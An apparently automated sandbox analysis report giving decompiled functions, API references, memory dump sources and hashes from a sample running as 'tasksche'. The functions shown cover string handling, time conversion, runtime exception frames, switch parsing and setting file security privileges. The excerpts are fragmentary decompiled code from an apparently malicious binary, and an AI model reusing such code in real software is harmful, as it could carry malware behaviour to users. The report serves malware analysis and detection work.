                                                                                              					if( *_t42 != 0 || _v8200 != 0x7b) {
                                                                                              						if(_v8200 == 0x7d || E0041A7AF( &_v8200) + _t32 > 0xfffb) {
                                                                                              							break;
                                                                                              						} else {
                                                                                              							E0041A7C9(_t42,  &_v8200);
                                                                                              							_t32 = E0041A7AF(_t42);
                                                                                              							_t43 = _t43 + 0xc;
                                                                                              							if(_t32 <= 0) {
                                                                                              								L11:
                                                                                              								if(_v5 == 0) {
                                                                                              									E0041A7F7(_t42 + _t32 * 2, L"\r\n");
                                                                                              								}
                                                                                              								continue;
                                                                                              							}
                                                                                              							_t6 = _t32 * 2; // -2
                                                                                              							_t28 = _t42 + _t6 - 2;
                                                                                              							while( *_t28 == 0x20) {
                                                                                              								_t32 = _t32 - 1;
                                                                                              								_t28 = _t28;
                                                                                              								if(_t32 > 0) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L11;
                                                                                              							}
                                                                                              							goto L11;
                                                                                              						}
                                                                                              					} else {
                                                                                              						continue;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t42;
                                                                                              			}















                                                                                              0x0040d92d
                                                                                              0x0040d935
                                                                                              0x0040d946
                                                                                              0x0040d94b
                                                                                              0x0040d952
                                                                                              0x0040d952
                                                                                              0x0040d959
                                                                                              0x0040d95c
                                                                                              0x0040d9d3
                                                                                              0x0040d9e8
                                                                                              0x0040d9ed
                                                                                              0x0040d9f1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d964
                                                                                              0x0040d978
                                                                                              0x00000000
                                                                                              0x0040d990
                                                                                              0x0040d998
                                                                                              0x0040d9a3
                                                                                              0x0040d9a5
                                                                                              0x0040d9aa
                                                                                              0x0040d9bd
                                                                                              0x0040d9c1
                                                                                              0x0040d9cc
                                                                                              0x0040d9d2
                                                                                              0x00000000
                                                                                              0x0040d9c1
                                                                                              0x0040d9ac
                                                                                              0x0040d9ac
                                                                                              0x0040d9b0
                                                                                              0x0040d9b6
                                                                                              0x0040d9b8
                                                                                              0x0040d9bb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d9bb
                                                                                              0x00000000
                                                                                              0x0040d9b0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d964
                                                                                              0x0040d9fc

                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0040D941
                                                                                                • Part of subcall function 0041CF3E: __FF_MSGBANNER.LIBCMT ref: 0041CF61
                                                                                                • Part of subcall function 0041CF3E: __NMSG_WRITE.LIBCMT ref: 0041CF68
                                                                                                • Part of subcall function 0041CF3E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004212F4,00000000,00000001,00000000,?,0041EF2D,00000018,0042D930,0000000C,0041EFBE), ref: 0041CFB5
                                                                                              • _wcslen.LIBCMT ref: 0040D981
                                                                                              • _wcscat.LIBCMT ref: 0040D998
                                                                                              • _wcslen.LIBCMT ref: 0040D99E
                                                                                              • _wcscpy.LIBCMT ref: 0040D9CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
                                                                                              • String ID: }
                                                                                              • API String ID: 2020890722-4239843852
                                                                                              • Opcode ID: 87a1d4075c0fbabaaf42ee75a1288eb88e4c448287557cbd43c96a9187b86b14
                                                                                              • Instruction ID: a9b9a9eb170ff11f00d7125a4cd00596761e48c06437fb6caf1dcbb108c8f9f0
                                                                                              • Opcode Fuzzy Hash: 87a1d4075c0fbabaaf42ee75a1288eb88e4c448287557cbd43c96a9187b86b14
                                                                                              • Instruction Fuzzy Hash: 6111B771D0131A59EB25ABE08CC57DB72B8DF00354F10007BE645E22D1EBBC9A99C39D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E00411541(signed int* __ecx, intOrPtr* _a4) {
                                                                                              				struct _FILETIME _v12;
                                                                                              				struct _FILETIME _v20;
                                                                                              				void* _v24;
                                                                                              				struct _FILETIME _v28;
                                                                                              				struct _SYSTEMTIME _v44;
                                                                                              				struct _SYSTEMTIME _v60;
                                                                                              				struct _SYSTEMTIME _v76;
                                                                                              				int _t52;
                                                                                              				void* _t67;
                                                                                              				long _t71;
                                                                                              				signed int* _t75;
                                                                                              				signed int _t84;
                                                                                              				intOrPtr* _t86;
                                                                                              				intOrPtr _t87;
                                                                                              
                                                                                              				_t86 = _a4;
                                                                                              				_v44.wYear =  *_t86;
                                                                                              				_t3 = _t86 + 4; // 0xffec8b55
                                                                                              				_v44.wMonth =  *_t3;
                                                                                              				_t5 = _t86 + 8; // 0x75ff1c75
                                                                                              				_v44.wDay =  *_t5;
                                                                                              				_t7 = _t86 + 0xc; // 0x1475ff18
                                                                                              				_v44.wHour =  *_t7;
                                                                                              				_t9 = _t86 + 0x10; // 0xff1075ff
                                                                                              				_v44.wMinute =  *_t9;
                                                                                              				_t11 = _t86 + 0x14; // 0x75ff0c75
                                                                                              				_v44.wSecond =  *_t11;
                                                                                              				_v44.wMilliseconds = 0;
                                                                                              				_t75 = __ecx;
                                                                                              				_t52 = SystemTimeToFileTime( &_v44,  &_v12);
                                                                                              				if(_t52 == 0) {
                                                                                              					 *_t75 =  *_t75 & 0x00000000;
                                                                                              					_t75[1] = _t75[1] & 0x00000000;
                                                                                              					return _t52;
                                                                                              				}
                                                                                              				_t16 = _t86 + 0x18; // 0xd00ae808
                                                                                              				_t87 =  *_t16;
                                                                                              				_v12.dwLowDateTime = _v12.dwLowDateTime + _t87;
                                                                                              				if(_v12.dwLowDateTime < _t87) {
                                                                                              					_v12.dwHighDateTime = _v12.dwHighDateTime + 1;
                                                                                              				}
                                                                                              				if(E00409C06() >= 0x600) {
                                                                                              					FileTimeToSystemTime( &_v12,  &_v60);
                                                                                              					__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
                                                                                              					SystemTimeToFileTime( &_v76,  &_v20);
                                                                                              					SystemTimeToFileTime( &_v60,  &_v28);
                                                                                              					_t84 = _v12.dwHighDateTime;
                                                                                              					asm("adc ecx, esi");
                                                                                              					_t67 = E0041ABD0(_v20.dwHighDateTime + _t84, 0, 0, 1);
                                                                                              					asm("sbb edx, esi");
                                                                                              					asm("sbb edx, esi");
                                                                                              					asm("adc edx, esi");
                                                                                              					_t71 = _t67 - _v28.dwLowDateTime + _v20.dwLowDateTime + _v12.dwLowDateTime;
                                                                                              					asm("adc edx, esi");
                                                                                              				} else {
                                                                                              					LocalFileTimeToFileTime( &_v12,  &_v20);
                                                                                              					_t84 = _v20.dwHighDateTime;
                                                                                              					_t71 = _v20.dwLowDateTime;
                                                                                              				}
                                                                                              				 *_t75 = _t71;
                                                                                              				_t75[1] = _t84;
                                                                                              				return _t71;
                                                                                              			}

















                                                                                              0x00411549
                                                                                              0x0041154f
                                                                                              0x00411553
                                                                                              0x00411557
                                                                                              0x0041155b
                                                                                              0x0041155f
                                                                                              0x00411563
                                                                                              0x00411567
                                                                                              0x0041156b
                                                                                              0x0041156f
                                                                                              0x00411573
                                                                                              0x00411577
                                                                                              0x00411584
                                                                                              0x00411590
                                                                                              0x00411592
                                                                                              0x00411596
                                                                                              0x00411642
                                                                                              0x00411645
                                                                                              0x00000000
                                                                                              0x00411645
                                                                                              0x0041159c
                                                                                              0x0041159c
                                                                                              0x0041159f
                                                                                              0x004115a5
                                                                                              0x004115a7
                                                                                              0x004115a7
                                                                                              0x004115b4
                                                                                              0x004115d4
                                                                                              0x004115e4
                                                                                              0x004115f2
                                                                                              0x004115fc
                                                                                              0x004115fe
                                                                                              0x0041160d
                                                                                              0x00411611
                                                                                              0x00411620
                                                                                              0x00411629
                                                                                              0x00411630
                                                                                              0x00411632
                                                                                              0x00411634
                                                                                              0x004115b6
                                                                                              0x004115be
                                                                                              0x004115c4
                                                                                              0x004115c7
                                                                                              0x004115c7
                                                                                              0x0041163b
                                                                                              0x0041163d
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,004116A7,?,?), ref: 00411592
                                                                                              • LocalFileTimeToFileTime.KERNEL32(004116A7,?), ref: 004115BE
                                                                                              • FileTimeToSystemTime.KERNEL32(004116A7,?), ref: 004115D4
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004115E4
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004115F2
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004115FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$Specific
                                                                                              • String ID:
                                                                                              • API String ID: 3144155402-0
                                                                                              • Opcode ID: f90245df41cc322dafe52bf530a12eef1bc8a67292351d8d3269b2ac88901438
                                                                                              • Instruction ID: daaaa78088cd12f13caf2716ff388f37494b9d87aa27411613d97d80370a29eb
                                                                                              • Opcode Fuzzy Hash: f90245df41cc322dafe52bf530a12eef1bc8a67292351d8d3269b2ac88901438
                                                                                              • Instruction Fuzzy Hash: 92313276D001199BCB14DFD4C840AEFB7B9FF48710F04452AE946E3250E634A945CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E0041DD85(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				intOrPtr _t48;
                                                                                              				intOrPtr _t57;
                                                                                              				void* _t58;
                                                                                              				void* _t61;
                                                                                              
                                                                                              				_t61 = __eflags;
                                                                                              				_t53 = __edx;
                                                                                              				_push(0x2c);
                                                                                              				_push(0x42d800);
                                                                                              				E0041FA9C(__ebx, __edi, __esi);
                                                                                              				_t48 = __ecx;
                                                                                              				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                              				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                              				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                              				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                              				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                              				 *((intOrPtr*)(_t58 - 0x28)) = E0041A3D6(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                              				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0041E9B4(__ecx, __edx, _t55, _t61) + 0x88));
                                                                                              				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0041E9B4(_t48, __edx, _t55, _t61) + 0x8c));
                                                                                              				 *((intOrPtr*)(E0041E9B4(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
                                                                                              				 *((intOrPtr*)(E0041E9B4(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                              				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                              				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                              				 *(_t58 - 4) = 1;
                                                                                              				 *((intOrPtr*)(_t58 - 0x1c)) = E0041A47B(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                              				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                              				 *(_t58 - 4) = 0xfffffffe;
                                                                                              				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                              				E0041DEAB(_t48, _t53, _t55, _t57, _t61);
                                                                                              				return E0041FAE1( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                              			}







                                                                                              0x0041dd85
                                                                                              0x0041dd85
                                                                                              0x0041dd85
                                                                                              0x0041dd87
                                                                                              0x0041dd8c
                                                                                              0x0041dd91
                                                                                              0x0041dd93
                                                                                              0x0041dd96
                                                                                              0x0041dd99
                                                                                              0x0041dd9c
                                                                                              0x0041dda3
                                                                                              0x0041ddb4
                                                                                              0x0041ddc2
                                                                                              0x0041ddd0
                                                                                              0x0041ddd8
                                                                                              0x0041dde6
                                                                                              0x0041ddec
                                                                                              0x0041ddf3
                                                                                              0x0041ddf6
                                                                                              0x0041de0c
                                                                                              0x0041de0f
                                                                                              0x0041de84
                                                                                              0x0041de8b
                                                                                              0x0041de92
                                                                                              0x0041de9f

                                                                                              APIs
                                                                                              • __CreateFrameInfo.LIBCMT ref: 0041DDAD
                                                                                                • Part of subcall function 0041A3D6: __getptd.LIBCMT ref: 0041A3E4
                                                                                                • Part of subcall function 0041A3D6: __getptd.LIBCMT ref: 0041A3F2
                                                                                              • __getptd.LIBCMT ref: 0041DDB7
                                                                                                • Part of subcall function 0041E9B4: __getptd_noexit.LIBCMT ref: 0041E9B7
                                                                                                • Part of subcall function 0041E9B4: __amsg_exit.LIBCMT ref: 0041E9C4
                                                                                              • __getptd.LIBCMT ref: 0041DDC5
                                                                                              • __getptd.LIBCMT ref: 0041DDD3
                                                                                              • __getptd.LIBCMT ref: 0041DDDE
                                                                                              • _CallCatchBlock2.LIBCMT ref: 0041DE04
                                                                                                • Part of subcall function 0041A47B: __CallSettingFrame@12.LIBCMT ref: 0041A4C7
                                                                                                • Part of subcall function 0041DEAB: __getptd.LIBCMT ref: 0041DEBA
                                                                                                • Part of subcall function 0041DEAB: __getptd.LIBCMT ref: 0041DEC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1602911419-0
                                                                                              • Opcode ID: 5eb10d2cb4eb5e2da6c5453d1fe4c56248c4e16d68a7da2668f442ad0aab7930
                                                                                              • Instruction ID: e3df1943845817192d3dafa627097d3dc4affc0cfff12b6418408f9c93a4c95a
                                                                                              • Opcode Fuzzy Hash: 5eb10d2cb4eb5e2da6c5453d1fe4c56248c4e16d68a7da2668f442ad0aab7930
                                                                                              • Instruction Fuzzy Hash: 9E1126B1D00209DFDF00EFA1C445AED7BB0FF04318F10806AF854AB251DB389A519B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 53%
                                                                                              			E0040D64B(void* __eflags, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				char _v2050;
                                                                                              				signed int _v2052;
                                                                                              				signed short _v2054;
                                                                                              				char _v2056;
                                                                                              				void* __ebx;
                                                                                              				void* _t19;
                                                                                              				void* _t21;
                                                                                              				void* _t24;
                                                                                              				void* _t27;
                                                                                              				void* _t30;
                                                                                              				WCHAR* _t36;
                                                                                              				void* _t37;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                              				_t19 = E00410C58(__eflags, _a4,  &_v2056, 0x400);
                                                                                              				_t45 = _t19;
                                                                                              				if(_t19 == 0) {
                                                                                              					return _t19;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_v8 = _v8 + 1;
                                                                                              						if(_v8 != 1 && (_v2056 == 0x2f || _v2056 == 0x2d)) {
                                                                                              							_t24 = CharUpperW(_v2054 & 0x0000ffff) - 0x44;
                                                                                              							if(_t24 == 0) {
                                                                                              								_push(0x800);
                                                                                              								_push( &_v2052);
                                                                                              								_push(0x44187a);
                                                                                              								L22:
                                                                                              								E00410B9C();
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							_t27 = _t24 - 1;
                                                                                              							if(_t27 == 0) {
                                                                                              								__eflags = CharUpperW(_v2052 & 0x0000ffff) - 0x4c;
                                                                                              								if(__eflags == 0) {
                                                                                              									__eflags = _v2050;
                                                                                              									if(__eflags == 0) {
                                                                                              										 *0x441879 = 1;
                                                                                              									}
                                                                                              								}
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							_t30 = _t27 - 0xb;
                                                                                              							if(_t30 == 0) {
                                                                                              								E0040D033(0x800, 0x44387a,  &_v2052);
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							if(_t30 != 3) {
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							_t36 = CharUpperW(_v2052 & 0x0000ffff);
                                                                                              							if(_t36 == 0) {
                                                                                              								L15:
                                                                                              								 *0x441874 = 1;
                                                                                              								L16:
                                                                                              								 *0x44184a = 1;
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							_t37 = _t36 - 0x31;
                                                                                              							if(_t37 == 0) {
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							_t38 = _t37 - 1;
                                                                                              							if(_t38 == 0) {
                                                                                              								 *0x441874 = 2;
                                                                                              								goto L16;
                                                                                              							}
                                                                                              							_t59 = _t38 != 0x1e;
                                                                                              							if(_t38 != 0x1e) {
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							_push(0x800);
                                                                                              							_push( &_v2050);
                                                                                              							_push(0x44287a);
                                                                                              							goto L22;
                                                                                              						}
                                                                                              						L23:
                                                                                              						_t21 = E00410C58(_t59, _t45,  &_v2056, 0x400);
                                                                                              						_t45 = _t21;
                                                                                              					} while (_t21 != 0);
                                                                                              					return _t21;
                                                                                              				}
                                                                                              			}

















                                                                                              0x0040d654
                                                                                              0x0040d66a
                                                                                              0x0040d66f
                                                                                              0x0040d673
                                                                                              0x0040d77e
                                                                                              0x0040d679
                                                                                              0x0040d67f
                                                                                              0x0040d67f
                                                                                              0x0040d686
                                                                                              0x0040d6b1
                                                                                              0x0040d6b4
                                                                                              0x0040d750
                                                                                              0x0040d757
                                                                                              0x0040d758
                                                                                              0x0040d75d
                                                                                              0x0040d75d
                                                                                              0x00000000
                                                                                              0x0040d75d
                                                                                              0x0040d6ba
                                                                                              0x0040d6bb
                                                                                              0x0040d738
                                                                                              0x0040d73b
                                                                                              0x0040d73d
                                                                                              0x0040d745
                                                                                              0x0040d747
                                                                                              0x0040d747
                                                                                              0x0040d745
                                                                                              0x00000000
                                                                                              0x0040d73b
                                                                                              0x0040d6bd
                                                                                              0x0040d6c0
                                                                                              0x0040d724
                                                                                              0x00000000
                                                                                              0x0040d724
                                                                                              0x0040d6c5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d6d8
                                                                                              0x0040d6db
                                                                                              0x0040d705
                                                                                              0x0040d705
                                                                                              0x0040d70f
                                                                                              0x0040d70f
                                                                                              0x00000000
                                                                                              0x0040d70f
                                                                                              0x0040d6dd
                                                                                              0x0040d6e0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d6e2
                                                                                              0x0040d6e3
                                                                                              0x0040d6f9
                                                                                              0x00000000
                                                                                              0x0040d6f9
                                                                                              0x0040d6e5
                                                                                              0x0040d6e8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d6ea
                                                                                              0x0040d6f1
                                                                                              0x0040d6f2
                                                                                              0x00000000
                                                                                              0x0040d6f2
                                                                                              0x0040d762
                                                                                              0x0040d76b
                                                                                              0x0040d770
                                                                                              0x0040d772
                                                                                              0x00000000
                                                                                              0x0040d77a

                                                                                              APIs
                                                                                              • CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D6AC
                                                                                              • CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D6D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharUpper
                                                                                              • String ID: -$z8D
                                                                                              • API String ID: 9403516-4016828469
                                                                                              • Opcode ID: 6e6643a8c5453ab08bb62a8daeba662149a01c951e73f69a55f52de3d79d5015
                                                                                              • Instruction ID: 6cb870ea5eaa954c7fe556a8e422e29c236d8a0fbf71e72dd1f5d8a9bc66e192
                                                                                              • Opcode Fuzzy Hash: 6e6643a8c5453ab08bb62a8daeba662149a01c951e73f69a55f52de3d79d5015
                                                                                              • Instruction Fuzzy Hash: FE21A5B9C0011995DB60B7E98D48BBB66A8FB41304F144177E548B32D2EA7CDECC8B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E0040680A(void* __ebx, void* __edx, void* __edi) {
                                                                                              				void* __esi;
                                                                                              				int _t24;
                                                                                              				int _t26;
                                                                                              				void* _t29;
                                                                                              				int _t32;
                                                                                              				void* _t34;
                                                                                              				struct _SECURITY_DESCRIPTOR* _t35;
                                                                                              				void* _t42;
                                                                                              				long _t43;
                                                                                              				struct _SECURITY_DESCRIPTOR* _t45;
                                                                                              				void* _t47;
                                                                                              				struct _SECURITY_DESCRIPTOR* _t51;
                                                                                              
                                                                                              				_t42 = __edi;
                                                                                              				_t34 = __ebx;
                                                                                              				E0041A4DC(E004294DA, _t47);
                                                                                              				E0041AAF0(0x1010);
                                                                                              				_t45 = 0;
                                                                                              				 *(_t47 - 0x1c) = 0;
                                                                                              				 *((intOrPtr*)(_t47 - 0x18)) = 0;
                                                                                              				 *((intOrPtr*)(_t47 - 0x14)) = 0;
                                                                                              				 *((intOrPtr*)(_t47 - 0x10)) = 0;
                                                                                              				_push(0);
                                                                                              				_push(_t47 - 0x1c);
                                                                                              				 *((intOrPtr*)(_t47 - 4)) = 0;
                                                                                              				_t24 = E00402C8B( *((intOrPtr*)(_t47 + 8)), __edx);
                                                                                              				if(_t24 != 0) {
                                                                                              					__eflags =  *0x4335a2;
                                                                                              					if( *0x4335a2 == 0) {
                                                                                              						_t32 = E00406553(L"SeSecurityPrivilege");
                                                                                              						__eflags = _t32;
                                                                                              						if(_t32 != 0) {
                                                                                              							 *0x4335a1 = 1;
                                                                                              						}
                                                                                              						E00406553(L"SeRestorePrivilege");
                                                                                              						 *0x4335a2 = 1;
                                                                                              					}
                                                                                              					__eflags =  *0x4335a1;
                                                                                              					_push(_t34);
                                                                                              					_push(_t42);
                                                                                              					_t43 = 7;
                                                                                              					if( *0x4335a1 != 0) {
                                                                                              						_t43 = 0xf;
                                                                                              					}
                                                                                              					_t35 =  *(_t47 - 0x1c);
                                                                                              					_t45 = SetFileSecurityW;
                                                                                              					_t24 = SetFileSecurityW( *(_t47 + 0xc), _t43, _t35);
                                                                                              					__eflags = _t24;
                                                                                              					if(_t24 == 0) {
                                                                                              						_t26 = E0040A3DC( *(_t47 + 0xc), _t47 - 0x101c, 0x800);
                                                                                              						__eflags = _t26;
                                                                                              						if(_t26 == 0) {
                                                                                              							L11:
                                                                                              							_t28 =  *((intOrPtr*)(_t47 + 8)) + 0x1e;
                                                                                              							__eflags =  *((intOrPtr*)(_t47 + 8)) + 0x1e;
                                                                                              							_t29 = E0040639F(0x4f, _t28,  *(_t47 + 0xc));
                                                                                              							_t45 = 0x4335ac;
                                                                                              							E00401000(_t29);
                                                                                              							_t24 = E004062BA(0x4335ac, 1);
                                                                                              						} else {
                                                                                              							_t24 = SetFileSecurityW(_t47 - 0x101c, _t43, _t35);
                                                                                              							__eflags = _t24;
                                                                                              							if(_t24 == 0) {
                                                                                              								goto L11;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					__eflags =  *(_t47 - 0x1c);
                                                                                              					_pop(_t42);
                                                                                              					_pop(_t34);
                                                                                              				} else {
                                                                                              					_t51 =  *(_t47 - 0x1c);
                                                                                              				}
                                                                                              				if(_t51 != 0) {
                                                                                              					_push( *(_t47 - 0x1c));
                                                                                              					_t24 = E0041A506(_t34, _t42, _t45, _t51);
                                                                                              				}
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                              				return _t24;
                                                                                              			}















                                                                                              0x0040680a
                                                                                              0x0040680a
                                                                                              0x0040680f
                                                                                              0x00406819
                                                                                              0x0040681f
                                                                                              0x00406821
                                                                                              0x00406824
                                                                                              0x00406827
                                                                                              0x0040682a
                                                                                              0x00406830
                                                                                              0x00406834
                                                                                              0x00406835
                                                                                              0x00406838
                                                                                              0x0040683f
                                                                                              0x00406849
                                                                                              0x00406850
                                                                                              0x00406857
                                                                                              0x0040685c
                                                                                              0x0040685e
                                                                                              0x00406860
                                                                                              0x00406860
                                                                                              0x0040686c
                                                                                              0x00406871
                                                                                              0x00406871
                                                                                              0x00406878
                                                                                              0x0040687f
                                                                                              0x00406880
                                                                                              0x00406883
                                                                                              0x00406884
                                                                                              0x00406888
                                                                                              0x00406888
                                                                                              0x00406889
                                                                                              0x0040688c
                                                                                              0x00406897
                                                                                              0x00406899
                                                                                              0x0040689b
                                                                                              0x004068ac
                                                                                              0x004068b1
                                                                                              0x004068b3
                                                                                              0x004068c4
                                                                                              0x004068ca
                                                                                              0x004068ca
                                                                                              0x004068d0
                                                                                              0x004068d5
                                                                                              0x004068dc
                                                                                              0x004068e5
                                                                                              0x004068b5
                                                                                              0x004068be
                                                                                              0x004068c0
                                                                                              0x004068c2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004068c2
                                                                                              0x004068b3
                                                                                              0x004068ea
                                                                                              0x004068ee
                                                                                              0x004068ef
                                                                                              0x00406841
                                                                                              0x00406841
                                                                                              0x00406841
                                                                                              0x004068f0
                                                                                              0x004068f2
                                                                                              0x004068f5
                                                                                              0x004068fa
                                                                                              0x004068ff
                                                                                              0x00406907

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040680F
                                                                                                • Part of subcall function 00402C8B: __EH_prolog.LIBCMT ref: 00402C90
                                                                                              • SetFileSecurityW.ADVAPI32(00000000,00000007,?,?,?,?,00000000,?,00406EF5,?,?,?,?,0040773A,?,?), ref: 00406897
                                                                                              • SetFileSecurityW.ADVAPI32(?,00000007,?,00000000,?,00000800,?,0040773A,?,?,?,?,?,00000000,0040839C,?), ref: 004068BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
